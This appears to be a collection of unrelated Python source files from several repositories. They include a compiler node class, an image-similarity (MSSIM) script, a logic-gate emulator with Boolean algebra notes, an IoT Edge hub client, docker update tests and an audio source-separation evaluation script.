class ExpressionBuiltinIntLong2Base(ExpressionSpecBasedComputationBase):
named_children = ("value", "base")
# Note: Version specific, may be allowed or not.
try:
int(base = 2)
except TypeError:
base_only_value = False
else:
base_only_value = True
# To be overloaded by child classes with int/long.
builtin = int
def __init__(self, value, base, source_ref):
if value is None and self.base_only_value:
value = makeConstantRefNode(
constant = '0',
source_ref = source_ref,
user_provided = True
)
ExpressionSpecBasedComputationBase.__init__(
self,
values = {
"value" : value,
"base" : base
},
source_ref = source_ref
)
getValue = ExpressionSpecBasedComputationBase.childGetter("value")
getBase = ExpressionSpecBasedComputationBase.childGetter("base")
def computeExpression(self, trace_collection):
value = self.subnode_value
base = self.subnode_base
if value is None:
if base is not None:
if not self.base_only_value:
return trace_collection.getCompileTimeComputationResult(
node = self,
computation = lambda : self.builtin(base = 2),
description = """\
%s built-in call with only base argument""" % self.builtin.__name__
)
given_values = ()
else:
given_values = (value, base)
return self.computeBuiltinSpec(
trace_collection = trace_collection,
given_values = given_values
)
class ExpressionBuiltinInt2(ExpressionBuiltinIntLong2Base):
kind = "EXPRESSION_BUILTIN_INT2"
builtin_spec = BuiltinParameterSpecs.builtin_int_spec
builtin = int
def getTypeShape(self):
return ShapeTypeIntOrLong
if python_version < 300:
class ExpressionBuiltinLong1(ExpressionChildrenHavingBase):
kind = "EXPRESSION_BUILTIN_LONG1"
named_children = ("value",)
def __init__(self, value, source_ref):
ExpressionChildrenHavingBase.__init__(
self,
values = {
"value" : value
},
source_ref = source_ref
)
def getTypeShape(self):
# TODO: Depending on input type shape and value, we should improve this.
return ShapeTypeLongDerived
def computeExpression(self, trace_collection):
return self.subnode_value.computeExpressionLong(
long_node = self,
trace_collection = trace_collection
)
getValue = ExpressionChildrenHavingBase.childGetter("value")
def mayRaiseException(self, exception_type):
return self.subnode_value.mayRaiseExceptionLong(exception_type)
class ExpressionBuiltinLong2(ExpressionBuiltinIntLong2Base):
kind = "EXPRESSION_BUILTIN_LONG2"
builtin_spec = BuiltinParameterSpecs.builtin_long_spec
builtin = long
def getTypeShape(self):
return ShapeTypeLong
``` |
{
"source": "4og/mssim",
"score": 3
} |
#### File: 4og/mssim/mssim.py
```python
import sys, os, numpy, scipy.misc
from scipy.ndimage import filters
class MSSIM:
def gaussian(self, size, sigma):
x = numpy.arange(0, size, 1, float)
y = x[:,numpy.newaxis]
xc = (size-1) / 2
yc = (size-1) / 2
gauss = numpy.exp(-((x-xc)**2 + (y-yc)**2) / (2*sigma**2))
return gauss / gauss.sum()
def compute(self, fn, fns, k=[0.01, 0.03]):
c1 = (k[0]*255)**2
c2 = (k[1]*255)**2
win = self.gaussian(11, 1.5)
im1 = scipy.misc.imread(fn, 1)
mu1 = filters.correlate(im1, win)
mu1_sq = mu1*mu1;
s1sq =filters.correlate(im1*im1, win)-mu1_sq
for f in fns:
im2 = scipy.misc.imread(f, 1)
if im1.shape != im2.shape:
print("{}: Incorrect image. All images "
"should be of equal size".format(f))
continue
mu2 = filters.correlate(im2, win)
mu2_sq = mu2*mu2;
mu1_mu2 = mu1*mu2;
s2sq = filters.correlate(im2*im2, win)-mu2_sq
s12 = filters.correlate(im1*im2, win)-mu1_mu2
ssims = ((2*mu1_mu2 + c1)*(2*s12 + c2))/ \
((mu1_sq + mu2_sq + c1)*(s1sq + s2sq + c2))
print("{:24} {:.4f}".format(os.path.basename(f), ssims.mean()))
if len(sys.argv) < 3:
print("Usage: mssim.py reference-image other-images ...")
exit()
MSSIM().compute(sys.argv[1], sys.argv[2:])
``` |
{
"source": "4ON91/KnickKnacks",
"score": 3
} |
#### File: KnickKnacks/Boolean Algebra Notes/LogicGates.py
```python
import copy
import csv
import os
class Gate:
def __init__(self, Sockets):
self.Sockets = Sockets
self.Inputs = []
self.UniqueInputs = ""
def canPass(self):
return(True)
def getInput(self, I):
if( (type(I) == Input) &
(I.sym().casefold() not in self.UniqueInputs.casefold()) ):
self.UniqueInputs += I.sym()
self.Inputs.append(I.On)
class Input:
def __init__(self, Symbol, On):
self.Symbol = Symbol.upper()[:1]
self.On = On
self.Position = (int, int)
def sym(self):
if(self.On):
return(self.Symbol.upper())
else:
return(self.Symbol.lower())
def csym(self):
return(self.Symbol.casefold())
def __repr__(self):
return(self.sym())
def __invert__(self):
if(self.On):
self.On = False
else:
self.On = True
def canPass(self):
return(False)
def canContinue(self, I):
return(True)
class Output:
def canPass(self):
return(True)
def canContinue(self, I):
return(True)
class AND(Gate):
def canContinue(self, I):
self.getInput(I)
if((True in self.Inputs)&
(False not in self.Inputs)&
(len(self.Inputs) >= self.Sockets)):
return(True)
else:
return(False)
class NAND(Gate):
def canContinue(self, I):
self.getInput(I)
if((False in self.Inputs)&
(True not in self.Inputs)&
(len(self.Inputs) >= self.Sockets)):
return(True)
else:
return(False)
class OR(Gate):
def canContinue(self, I):
self.getInput(I)
if( (len(self.Inputs) >= self.Sockets) &
(True in self.Inputs) ):
return(True)
else:
return(False)
class NOR(Gate):
def canContinue(self, I):
self.getInput(I)
if( (len(self.Inputs) >= self.Sockets) &
(False in self.Inputs) ):
return(True)
else:
return(False)
class INVERT:
def canPass(self):
return(True)
def canContinue(self, I):
~I
return(True)
class CircuitPath:
def __init__(self, Passable):
self.Passable = Passable
def canPass(self):
return(self.Passable)
def canContinue(self, I):
return(True)
def SwitchStateList(NumberOfSwitches):
binary_string = ""
i = 0
Switches = NumberOfSwitches
Switch_States = []
while( len(binary_string) <= NumberOfSwitches ):
binary_string = str(bin(i))[2:]
i += 1
Switch_States.append(("{:>0%s}"%str(Switches)).format(binary_string))
Switch_States.pop(-1)
return(Switch_States)
def ANDList(NumberOfSwitches):
a = list("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
binary_string = ""
i = 0
Switches = NumberOfSwitches
Switch_States = []
while( len(binary_string) <= NumberOfSwitches ):
binary_string = ("{:>0%s}"%str(Switches)).format(str(bin(i))[2:])
b = ""
for x in range(0, len(binary_string)):
if(int(binary_string[x]) == 0):
b += a[x].lower()
else:
b += a[x].upper()
i += 1
Switch_States.append(b)
Switch_States.pop(-1)
return(Switch_States)
def RunCircuit(file):
OP1 = OR(1)
OP2 = OR(2)
OP3 = OR(3)
ON1 = NOR(1)
ON2 = NOR(2)
ON3 = NOR(3)
AP1 = AND(1)
AP2 = AND(2)
AP3 = AND(3)
AN1 = NAND(1)
AN2 = NAND(2)
AN3 = NAND(3)
CP0 = CircuitPath(False)
CP1 = CircuitPath(True)
I00 = Input("A", False)
I01 = Input("B", True)
I02 = Input("C", True)
OUT = Output()
INV = INVERT()
Circuit_Array = [line for line in csv.reader(open(file, "r"))]
for y in range(0, len(Circuit_Array)):
for x in range(0, len(Circuit_Array[0])):
exec("Circuit_Array[y][x] = " + Circuit_Array[y][x])
Circuit = copy.deepcopy(Circuit_Array)
Row = len(Circuit)-1
Col = len(Circuit[0])-1
Integers = []
Input_List = []
for y in range(0, len(Circuit)):
for x in range(0, len(Circuit[0])):
if(type(Circuit[y][x]) == Input):
Circuit[y][x].Position = (x,y)
Input_List.append(Circuit[y][x])
def BoolMove(Tile, Direction):
if(Tile.canPass()):
return(Direction)
else:
return("")
def GetDirection(Position, Direction):
X, Y = Position
if(Direction == "N"):
X, Y = X, Y-1
if(Direction == "E"):
X, Y = X+1, Y
if(Direction == "S"):
X, Y = X, Y+1
if(Direction == "W"):
X, Y = X-1, Y
return((X, Y))
def FindOutput(Input, CurrentPosition, Directions, Map, Length, Path, Globals):
X, Y = CurrentPosition
while(True):
if len(Directions) >= 2:
for Direction in Directions:
FindOutput(Input, (X,Y), Direction, copy.deepcopy(Map), Length, copy.deepcopy(Path), Globals)
return
Map[Y][X] = CP0
if( Globals[Y][X].canContinue(Input) ):
pass
else:
Integers.append([0, Input.sym(), Length, Path])
return
if(len(Directions) > 0):
Path.append(Directions)
X, Y = GetDirection((X,Y), Directions)
if( type(Globals[Y][X]) == Output):
Integers.append([1, Input.sym(), Length, Path])
return
Directions = ""
if(Y-1 >= 0):
Directions += BoolMove(Map[Y-1][X], "N")
if(X+1 <= Col):
Directions += BoolMove(Map[Y][X+1], "E")
if(Y+1 <= Row):
Directions += BoolMove(Map[Y+1][X], "S")
if(X-1 >= 0):
Directions += BoolMove(Map[Y][X-1], "W")
if len(Directions) == 0:
Integers.append([0, Input.sym(), Length, Path])
return
Length += 1
Input_List.sort(key = Input.csym)
for I in Input_List:
FindOutput(I, I.Position, "", copy.deepcopy(Circuit), 0, [], Circuit_Array)
return(Integers)
EmulatedCircuit = RunCircuit("T01.txt")
for line in EmulatedCircuit:
print(line)
"""
C * ( (A*B) + (a*B) )
C * ( (A*b) + a )
A * ( (B*c) + (b*C) + (a*B) ) * B
C * ( (B*C*a) + (a * (B+C)) )
A - 835
Simplying circuit
ab + aB + Ab
a*(B+b) + Ab
a*(1) + Ab
a + Ab
(A+aB)*(B+bA)
(A*B) + (A*bA) + (aB * B) + (aB*bA)
AB + Ab + aB + aBbA (Switches can't be on and off at the same time so we get rid of aBbA)
AB + Ab + aB + 0
AB + Ab + aB
A*(B+b) + aB (We simplify the equation now by grouping like terms)
A(B+b) + aB (and again; Switches can't be on and off at the same time so we get rid of Bb)
A + aB (and we're left with this)
ABc + ABC + aBC
AB(c+C) + aBC = (ABc + ABC + aBC, but simplified)
AB(1) + aBC (Adding a switch's opposite to itself is equal to '1')
AB + aBC (A switch multiplied by 1 is equal to itself)
B(A + aC)
abC + aBC + AbC + ABC
bC(Aa) + BC(Aa)
bC(1) + BC(1)
bC + BC
C(Bb) = bC + BC
C(1)
C
0
1
10
11
100
101
110
111
1000
1001
1010
1011
1100
1101
1110
1111
Ac + a(B+C) + AB(C+b)
Ac + aB + aC + ABC + ABb
Ac + aB + aC + ABC + A(0) ( A switch multiplied by its opposite is equal to '0')
Ac + aB + aC + ABC
A(c+BC) + aB + aC (Rule 17: A + aB = A+B)
A(c+B) + aB + aC
Ac + AB + aB + aC
Ac + B(A+a)
Ac + B + aC (Simplify until you have a set of unique variables)
AbC + AB(aC) + BC(bA)
AbC + ABa + ABC + BCb + BCA
AbC + 0*B + ABC + 0*C + ABC
AbC + ABC + ABC (ABC + ABC = ABC)
AbC + ABC
AC(b+B)
AC(1)
AC
HEM 11 46 105
835
1
ab + aB
a(b + B)
a
2
aB + AB + ab
a(B+b) + AB
a + AB
3
ab + Ab + b(A+a)
ab + Ab + b(1)
ab +Ab + b
b(Aa) + b
b(1) + b
b + b
b
4
Ab + A(B+b) + AB
Ab + AB + Ab + AB
Ab + Ab = Ab
AB + AB = AB
Ab + AB
A(Bb)
A
5
(A+AB)*(B+BA)
(AB) + (A*AB) + (AB*B) + (AB*AB)
AB + (A*A)B + A(B*B) + AB
AB + A(B) + A(B) + AB
AB
6
abC + aBC + AbC
bC(a + A) + aBC
bC(a + A) + aBC
bC(1) + aBC
bC + aBC
C(b + aB)
7
Abc + ABC + aBC
Abc + BC(A+a)
Abc + BC
8
abc + aBC + Abc
bc(a+A) + aBC
bc + aBC
9
abc + abC + Abc + AbC
ab(c+C) + Ab(c+C)
ab + Ab
b(A+a)
b
10
AbC + ABC + ABc + aBc
AbC + ABC + Bc(A+a)
AbC + ABC + Bc
AC(b+B) + Bc
AC + Bc
11
C(AB+Ab) + c(ab+aB)
ABC + AbC + abc + aBc
AC(B+b) + ac(b+B)
AC + ac
12
c(ab + AB + Ab) + A(BC + bC)
abc + ABc + Abc + ABC + AbC
abc + A(Bc + bC) + A(bc+BC)
abc + A + A
abc + A -shallow simplification
c(ab + AB + Ab) + A(BC+ bC)
abc + ABc + Abc + ABC + AbC
bc(a+A) ABc + ABC + AbC
bc + ABc + ABC + AbC
bc + AB(c+C) + AbC
bc + AB + AbC
b(c + AC) + AB
b(c+A) + AB
bc + Ab + AB
bc + A(b+B)
bc + A -deeper simplification
A + bc
AbC * aBc
11.4 106 De Morgan's laws
____ __
(Ab+C)*(a+Bc)
t1: (a+B)*c = ac + Bc
t2: a + (b+C) = a + b + C
(ac+Bc)*(a+b+C)
aac + abc + acC + aBc + Bbc + BcC
ac + abc + 0 + aBc + 0 + 0
ac + abc + aBc
ac(B+b) + ac
ac + ac
ac
__ ___
(aB)+(a+B)
(A+b)+A*b
A+Ab+b (A+AB) = A, regardless of any of the variable's states.
A+b
HEM 11.4 E47 107
1
__
(ab)*(aB)
(ab)*(A+b)
Aab + abb
0 + ab
ab
2 __ __
(A+BC)+(AB+C) = a+b+C
((A+b)*c) + (a+b+C)
Ac+bc+a+b+C
(a+Ac)+(b+bc)+C
a+b+C
3
_____ __
(aB+Bc)*(Ab)
((A+b)*(b+C))*(a+B)
(Ab+AC+bb+bC)*(a+B)
Aab+ABb+AaC+ABC+abb+Bbb+abC+BbC
0+0+0+ABC+ab+0+abC+0
ABC+ab+abC (ab+abC = ab ???)
ABC + ab
4
__ __ __
(Ab+Bc)+(aB)
(a+B+b+C)+(A+b)
a+B+b+C+A+b
(A+a)+(B+b)+C
1 + 1 + C
(C+1) + 1
1 + 1 = 1 ???
5
__ __ __
(Ab+aC)*(aBC) = a(b+c)
(a+B+A+c)*(a*(b+c))
(a+B+A+c)*(ab+ac)
aab+aac+aBb+aBc+Aab+Aac+abc+acc
ab+ac+0+aBc+0+0+abc+ac
ab+ac+aBc+abc+ac
(ac+ac)+(ab+aBc)+(ac+acb)
ac+ab+ac
ac+ab
a(b+c)
"""
``` |
{
"source": "4or5trees/azure-iot-starter-kits",
"score": 3
} |
#### File: modules/speech-to-text/hubmanager.py
```python
import os
import sys
import iothub_client
from iothub_client import IoTHubModuleClient, IoTHubClientError, IoTHubTransportProvider
# messageTimeout - the maximum time in milliseconds until a message times out.
# The timeout period starts at IoTHubClient.send_event_async.
# By default, messages do not expire.
MESSAGE_TIMEOUT = 10000
class HubManager(object):
def __init__(self, connection_string = None, protocol = IoTHubTransportProvider.MQTT):
if not connection_string:
connection_string = os.environ['EdgeHubConnectionString']
print("\nPython %s\n" % sys.version)
print("IoT Hub Client for Python")
print("Starting the IoT Hub Python sample using protocol %s..." % protocol)
self.client = IoTHubModuleClient()
self.client.create_from_environment(protocol)
# set the time until a message times out
self.client.set_option("messageTimeout", MESSAGE_TIMEOUT)
# some embedded platforms need certificate information
self.set_certificates()
def set_certificates(self):
CERT_FILE = os.environ['EdgeModuleCACertificateFile']
print("Adding TrustedCerts from: {0}".format(CERT_FILE))
# this brings in x509 privateKey and certificate
with open(CERT_FILE) as file:
try:
self.client.set_option("TrustedCerts", file.read())
print("set_option TrustedCerts successful")
except IoTHubClientError as iothub_client_error:
print("set_option TrustedCerts failed (%s)" % iothub_client_error)
``` |
{
"source": "4p00rv/docker-release-process",
"score": 2
} |
#### File: docker-release-process/tests/test_server.py
```python
from .context import UpdateEndpoint, Authorize
import docker
import unittest
try:
from unittest import mock
except ImportError:
import mock
class ServerTestSuite(unittest.TestCase):
def test_authorize(self):
self.assertFalse(Authorize('abcd'))
self.assertTrue(Authorize('DEKU_TEST_TOKEN'))
@mock.patch('deku.server.flask')
@mock.patch('deku.server.docker')
def test_update_call(self, mockFlask, mockkDocker):
mockFlask.Flask = mock.Mock()
mockFlask.request = mock.Mock()
mockFlask.request.values = mock.Mock()
mockClient = mock.Mock()
def get_arg(arg):
if arg in args: return args[arg]
with mock.patch('deku.server.Services', side_effect=lambda base_url=None: mockClient):
with mock.patch('deku.server.flask.request.values.get', side_effect=get_arg):
args = { 'name': 'rpc' }
res = UpdateEndpoint()
self.assertEqual(res, {'error': 'Invalid secret.'})
args = { 'name': 'rpc','secret': 'DEKU_TEST_TOKEN' }
res = UpdateEndpoint()
mockClient.get_status.assert_called_with(filters={'name': args['name']})
args['image'] = 'SomeImage'
res = UpdateEndpoint()
func_args = { 'update_config': {'image': args['image']}, 'filters': {'name': args['name']} }
mockClient.update.assert_called_with(**func_args)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4p0pt0Z/Audio_blind_source_separation",
"score": 3
} |
#### File: 4p0pt0Z/Audio_blind_source_separation/separation_examples_and_compute_metrics.py
```python
import librosa
import argparse
import numpy as np
import warnings
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import scale as mscale
from matplotlib import transforms as mtransforms
from separator import AudioSeparator
import librosa.display
import os
class MelScale(mscale.ScaleBase):
r"""Mel Scale transform for axis in plots
Here we want to use the Mel scale, with ticks values in kHz.
WARNING: There is a bug at the moment and the scale does not adjust to the extremal values of the axis.
See https://matplotlib.org/gallery/scales/custom_scale.html for example of using custom scale.
"""
name = 'mel'
def __init__(self, axis, *, fmin=0.0, fmax=8.0, **kwargs):
mscale.ScaleBase.__init__(self)
self.fmin = fmin
self.fmax = fmax
def get_transform(self):
return self.MelTransform()
def set_default_locators_and_formatters(self, axis):
pass
def limit_range_for_scale(self, vmin, vmax, minpos):
return self.fmin, self.fmax
class MelTransform(mtransforms.Transform):
input_dims = 1
output_dims = 1
is_separable = True
has_inverse = True
def __init__(self):
mtransforms.Transform.__init__(self)
def transform_non_affine(self, a):
return librosa.hz_to_mel(a * 1000.0)
def inverted(self):
return MelScale.InvertedMelTransform()
class InvertedMelTransform(mtransforms.Transform):
input_dims = 1
output_dims = 1
is_separable = True
has_inverse = True
def __init__(self):
mtransforms.Transform.__init__(self)
def transform_non_affine(self, a):
return librosa.mel_to_hz(a) / 1000.0
def inverted(self):
return MelScale.MelTransform()
def main():
r"""This script was used to generate the spectrograms and masks pictures of the master thesis for the section
about the TUT rare sound event 2017 data set.
It does:
- creates an AudioSeparator from a model checkpoint
- use the model to get separation masks for an example of each class
- saves the mask figures to a folder that has the model checkpoint name, next to the model.
- run evaluation of the model on the validation set and prints the results
"""
# Register Mel scale
mscale.register_scale(MelScale)
# Get model checkpoint path and the folder where the audio separated by the model will be saved
parser = argparse.ArgumentParser(allow_abbrev=False,
description="For the model specified by input, computes the separated audio "
"files of the ICASP2018 challenge, then evaluate the separation "
"metrics")
parser.add_argument("--sep_audio_folder", type=str, required=True,
help="Folder to store the separated audio files.")
parser.add_argument("--model_ckpt", type=str, required=True,
help="Path to the checkpoint of the model to evaluate.")
user_args = vars(parser.parse_known_args()[0])
model_ckpt = user_args['model_ckpt']
separated_audio_folder = user_args['sep_audio_folder']
# Load model in separation and evaluation framework
synthetizer = AudioSeparator.from_checkpoint(
{"checkpoint_path": model_ckpt, "separated_audio_folder": separated_audio_folder})
# Path to the folder were to save the pictures
save_path = os.path.join(os.path.dirname(model_ckpt),
os.path.splitext(os.path.basename(model_ckpt))[0] + '_figures')
if not os.path.exists(save_path):
os.makedirs(save_path)
else:
raise RuntimeError('Figure directory already exists ! ')
# Run Separation on 1 example of each class, and save the figures
baby_cry_example = 17
_, babycrymask = synthetizer.model(synthetizer.data_set.__getitem__(baby_cry_example)[0].unsqueeze(0))
babycrymask = babycrymask.detach().clone().squeeze()[0]
fig1, axs = plt.subplots(1, 1, figsize=(5, 3))
axs.pcolormesh(np.arange(babycrymask.shape[1]) * synthetizer.data_set.config['STFT_frame_shift_ms'] / 1000,
librosa.filters.mel_frequencies(64, fmin=1, fmax=8000) / 1000,
np.squeeze(babycrymask),
cmap='magma', vmin=0.0, vmax=1.0, zorder=0)
axs.set_yscale('mel')
plt.locator_params(axis='y', nbins=4)
plt.tight_layout()
plt.show()
fig1.savefig(os.path.join(save_path, 'babycry_mask.svg'), format='svg', bbox_inches='tight')
fig1.savefig(os.path.join(save_path, 'babycry_mask.eps'), format='eps', bbox_inches='tight')
fig1.savefig(os.path.join(save_path, 'babycry_mask.pdf'), format='pdf', bbox_inches='tight')
gunshot_example = 50
_, gunshotmask = synthetizer.model(synthetizer.data_set.__getitem__(gunshot_example)[0].unsqueeze(0))
gunshotmask = gunshotmask.detach().clone().squeeze()[1]
fig2, axs = plt.subplots(1, 1, figsize=(5, 3))
axs.pcolormesh(np.arange(gunshotmask.shape[1]) * synthetizer.data_set.config['STFT_frame_shift_ms'] / 1000,
librosa.filters.mel_frequencies(64, fmin=1, fmax=8000) / 1000,
np.squeeze(gunshotmask),
cmap='magma', vmin=0.0, vmax=1.0, zorder=0)
axs.set_yscale('mel')
plt.locator_params(axis='y', nbins=4)
plt.tight_layout()
plt.show()
fig2.savefig(os.path.join(save_path, 'gunshot_mask.svg'), format='svg', bbox_inches='tight')
fig2.savefig(os.path.join(save_path, 'gunshot_mask.eps'), format='eps', bbox_inches='tight')
fig2.savefig(os.path.join(save_path, 'gunshot_mask.pdf'), format='pdf', bbox_inches='tight')
glassbreak_example = 131
_, glassbreakmask = synthetizer.model(synthetizer.data_set.__getitem__(glassbreak_example)[0].unsqueeze(0))
glassbreakmask = glassbreakmask.detach().clone().squeeze()[2]
fig3, axs = plt.subplots(1, 1, figsize=(5, 3))
axs.pcolormesh(np.arange(glassbreakmask.shape[1]) * synthetizer.data_set.config['STFT_frame_shift_ms'] / 1000,
librosa.filters.mel_frequencies(64, fmin=1, fmax=8000) / 1000,
np.squeeze(glassbreakmask),
cmap='magma', vmin=0.0, vmax=1.0, zorder=0)
axs.set_yscale('mel')
plt.locator_params(axis='y', nbins=4)
plt.tight_layout()
plt.show()
fig3.savefig(os.path.join(save_path, 'glassbreak_mask.svg'), format='svg', bbox_inches='tight')
fig3.savefig(os.path.join(save_path, 'glassbreak_mask.eps'), format='eps', bbox_inches='tight')
fig3.savefig(os.path.join(save_path, 'glassbreak_mask.pdf'), format='pdf', bbox_inches='tight')
# Run separation for all files in the validation set
synthetizer.separate(separation_method='in_lin')
# Compute the separation metrics for all files in the validation data set.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
sdrs, sirs, sars = synthetizer.evaluate_separation()
# Print the separation results per class and mixture.
# {class} mixes: the mixture file contains an event and background noise
# {class} only: the mixture file only contains the event.
indices_babycry = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 0] == 1)[0]
indices_glassbreak = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 1] == 1)[0]
indices_gunshot = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 2] == 1)[0]
indices_background = np.where(synthetizer.data_set.labels.cpu().numpy()[:, 3] == 1)[0]
indices_babycry_mix = np.intersect1d(indices_babycry, indices_background)
indices_glassbreak_mix = np.intersect1d(indices_glassbreak, indices_background)
indices_gunshot_mix = np.intersect1d(indices_gunshot, indices_background)
indices_babycry_only = np.setdiff1d(indices_babycry, indices_background)
indices_glassbreak_only = np.setdiff1d(indices_glassbreak, indices_background)
indices_gunshot_only = np.setdiff1d(indices_gunshot, indices_background)
format_string = 'mean {:^9.4f}, std {:^9.4f}, median {:^9.4f}\nSIR: mean {:^9.4f}, std {:^9.4f}, ' \
'median {:^9.4f}\nSAR: mean {:^9.4f}, std {:^9.4f}, median {:^9.4f}'
print('Babycry mixes\nSDR: ' + format_string.format(
sdrs[indices_babycry_mix, 0].mean(), sdrs[indices_babycry_mix, 0].std(),
np.median(sdrs[indices_babycry_mix, 0]),
sirs[indices_babycry_mix, 0].mean(), sirs[indices_babycry_mix, 0].std(),
np.median(sirs[indices_babycry_mix, 0]),
sars[indices_babycry_mix, 0].mean(), sars[indices_babycry_mix, 0].std(),
np.median(sars[indices_babycry_mix, 0])))
print('Babycry only\nSDR: ' + format_string.format(
sdrs[indices_babycry_only, 0].mean(), sdrs[indices_babycry_only, 0].std(),
np.median(sdrs[indices_babycry_only, 0]),
sirs[indices_babycry_only, 0].mean(), sirs[indices_babycry_only, 0].std(),
np.median(sirs[indices_babycry_only, 0]),
sars[indices_babycry_only, 0].mean(), sars[indices_babycry_only, 0].std(),
np.median(sars[indices_babycry_only, 0])))
print('Glassbreak mixes\nSDR: ' + format_string.format(
sdrs[indices_glassbreak_mix, 1].mean(), sdrs[indices_glassbreak_mix, 1].std(),
np.median(sdrs[indices_glassbreak_mix, 1]),
sirs[indices_glassbreak_mix, 1].mean(), sirs[indices_glassbreak_mix, 1].std(),
np.median(sirs[indices_glassbreak_mix, 1]),
sars[indices_glassbreak_mix, 1].mean(), sars[indices_glassbreak_mix, 1].std(),
np.median(sars[indices_glassbreak_mix, 1])))
print('Glassbreak only\nSDR: ' + format_string.format(
sdrs[indices_glassbreak_only, 1].mean(), sdrs[indices_glassbreak_only, 1].std(),
np.median(sdrs[indices_glassbreak_only, 1]),
sirs[indices_glassbreak_only, 1].mean(), sirs[indices_glassbreak_only, 1].std(),
np.median(sirs[indices_glassbreak_only, 1]),
sars[indices_glassbreak_only, 1].mean(), sars[indices_glassbreak_only, 1].std(),
np.median(sars[indices_glassbreak_only, 1])))
print('Gunshot mixes\nSDR: ' + format_string.format(
sdrs[indices_gunshot_mix, 2].mean(), sdrs[indices_gunshot_mix, 2].std(),
np.median(sdrs[indices_gunshot_mix, 2]),
sirs[indices_gunshot_mix, 2].mean(), sirs[indices_gunshot_mix, 2].std(),
np.median(sirs[indices_gunshot_mix, 2]),
sars[indices_gunshot_mix, 2].mean(), sars[indices_gunshot_mix, 2].std(),
np.median(sars[indices_gunshot_mix, 2])))
print('Gunshot only\nSDR: ' + format_string.format(
sdrs[indices_gunshot_only, 2].mean(), sdrs[indices_gunshot_only, 2].std(),
np.median(sdrs[indices_gunshot_only, 2]),
sirs[indices_gunshot_only, 2].mean(), sirs[indices_gunshot_only, 2].std(),
np.median(sirs[indices_gunshot_only, 2]),
sars[indices_gunshot_only, 2].mean(), sars[indices_gunshot_only, 2].std(),
np.median(sars[indices_gunshot_only, 2])))
if __name__ == '__main__':
main()
```
#### File: 4p0pt0Z/Audio_blind_source_separation/separator.py
```python
import torch
import librosa
import numpy as np
import mir_eval
import separation_model as md
import data_set as dts
from shutil import copyfile
import os
class AudioSeparator:
r"""Implements a framework for using a SeparationModel to produce separated source for all files in the
validation set and measure the separation performances in terme of signal to distortion ratio (SDR),
signal to interference ratio (SIR) and signal to artifact ratio (SAR).
"""
@classmethod
def default_config(cls):
r"""Get the required parameters for instantiating a AudioSeparator
The configuration parameters for the model and the AudioDataSet are saved in the model checkpoint. All we
need for instantiation is the path to the check point.
The path to the folder to use for saving the separated audio tracks is also exposed.
Returns:
dict containing the required parameters
"""
config = {
"checkpoint_path": "", # path to model checkpoint
"separated_audio_folder": "" # path to folder where to save the separated audio tracks.
}
return config
def __init__(self, data_set, model, config):
r"""Constructor. Receives the AudioDataSet and the Model and stores them as class members.
Note: The received data_set features should not be scaled or centered.
Args:
data_set (AudioDataSet): The data set with the mixtures to separate
model (SeparationModel): The separation model for performing separation
config (dict): Configuration dictionary with parameters for the model, dataset and self.
"""
self.config = config
self.data_set = data_set
# Normalize or standardize the features, to have them ready to use as model input
self.data_set.shift_and_scale(self.config["shift"], self.config["scaling"])
self.model = model
self.model.eval()
self.device = torch.device("cpu") if not self.config["use_gpu"] \
else torch.device("cuda:" + str(self.config["gpu_no"]))
@classmethod
def from_checkpoint(cls, config, which_data_set="test"):
r"""Instantiate an AudioSeparator from a model checkpoint.
Loads the model from its checkpoint.
The checkpoint also contains the configuration dictionary required to create the validation set related
to the set used to train the model.
Args:
config (dict): Configuration dictionary with the parameters in defined in 'default_config()'
which_data_set (str): Identifier of the set type for the 'split' method of the AudiodataSet. 'train',
'test' or 'val'
Returns:
AudioSeparator using the model loaded from the checkpoint path in 'config'
"""
# Load the checkpoint
filename = config["checkpoint_path"]
if not os.path.isfile(filename):
raise ValueError("File " + filename + " is not a valid file.")
print("Loading model ...'{}'".format(filename))
state = torch.load(filename, 'cpu')
# Get the configuration paramters used during the training of the model.
train_config = state["config"]
# Update those parameters with the AudioSeparator parameters.
train_config.update(config)
# Build the data set containing the audio to separate.
val_set = dts.find_data_set_class(train_config["data_set_type"]).split(train_config, which_data_set)
# Build the SeparationModel and load its parameters
model = md.SeparationModel(train_config, val_set.features_shape(), val_set.n_classes())
model.load_state_dict(state["model_state_dict"])
# Build the AudioSeparator
return cls(val_set, model, train_config)
def separate_spectrogram(self, masks, features, features_idx):
r"""Apply masks to models input features to generate a spectrogram for each audio source.
There are many ways to use separation masks to produce spectrograms for each sources in the input features.
This function does the following:
- Rescale the masks to the shape of the SeparationModel input
(this is only useful if the MaskModel in the SeparationModel does not preserve the shape of its input
with padding)
- Shift the features to [0, +inf[, apply the mask and shift back.
(This is because the features can have negative values, and we want a value of 0 in the mask to
correspond to the lowest possible energy)
- The previous step provides us with 'masked features': these features should correspond to separated
sources. The last step is to convert back these features (scaled and centered log-Mel-spectrogram,
PCEN, ...) to a 'spectrogram' representation that can be converted back to audio with Inverse STFT.
Note: It has be found experimentally that apply the masks at the 'features' level give worst results than
converting the masks to 'spectrogram' representation and applying them directly to the mixture
spectrogram, because converting the features back to the spectrogram scale often implies to take the
exponential of the fetures which amplifies a lot the noise.
The other processing is performed by 'separate_spectrogram_in_lin_scale()'.
Args:
masks (torch.Tensor): Shape: [n_class, ~freq, ~time]. The masks produced by the separation model.
features (torch.Tensor): Shape [channel, freq, time]. The input features to the separation model.
features_idx (int): index of the features in data_set.features
Returns:
Spectrogram of the sources separated by the masks. shape: [n_sources, channel=1, Frequency, Time]
"""
# resize the masks to the size of the features (shape: [n_masks, channel, freq, time]
# This does something only if the masks have different shape than features (if MaskModel doesn't preserve shape)
masks = torch.nn.functional.interpolate(masks.unsqueeze(1),
size=(features.shape[1], features.shape[2]),
mode='bilinear',
align_corners=False)
# Multiply each mask with the features (shape: [n_masks, channel, features.shape[0], features.shape[1]]
shift = features.abs().max()
spectrograms = masks * (features + shift) - shift
# Undo the feature scaling and centering
self.data_set.rescale_to_initial(spectrograms, self.config["shift"], self.config["scaling"])
# From Log Mel spectrogram or PCEN to STFT magnitude (energy spectrogram)
return self.data_set.features_to_stft_magnitudes(spectrograms.cpu().numpy(), features_idx)
def separate_spectrogram_in_lin_scale(self, masks, features_shape, mixture_spectrogram):
r"""Apply masks to the mixture spectrogram to generate spectrograms for each separated sources.
